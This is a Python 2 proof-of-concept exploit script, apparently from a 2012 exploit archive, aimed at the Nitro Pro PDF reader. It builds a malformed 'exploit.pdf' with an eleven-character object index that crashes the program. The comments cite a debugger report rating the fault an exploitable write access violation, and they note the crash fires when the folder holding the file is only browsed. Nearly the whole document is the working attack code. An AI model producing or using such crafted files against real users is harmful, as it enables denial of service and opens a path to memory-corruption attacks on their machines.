#!C:\Python27\python.exe # # Nitro Pro # 0Day DoS POC by John Cobb - www.NoBytes.com - 2012-10-07 - [v1.0] # Tested on Win7 64bit # # When the Object Index exceeds 10 characters the app crashes: # # !exploitable # BUG_TITLE:Exploitable - User Mode Write AV starting at npdf!ProvideCoreHFT+0x000000000010886a (Hash=0x265b4f1d.0x020d4f2c) # EXPLANATION:User mode write access violations that are not near NULL are exploitable. # # Bonus: App crashes when just browsing the folder which contains the PDF... # sPDFHeader = "\x25\x50\x44\x46\x2D\x31\x2E\x32\x0D" sPDFComment = "\x25\xE2\xE3\xCF\xD3\x0A" sPDFObjectIndex = "\x31" * 11 # The Crash sPDFObject = "\x20\x30\x20\x6F\x62\x6A" payload = sPDFHeader + sPDFComment + sPDFObjectIndex + sPDFObject f = open("exploit.pdf", 'w') f.write(payload) f.close()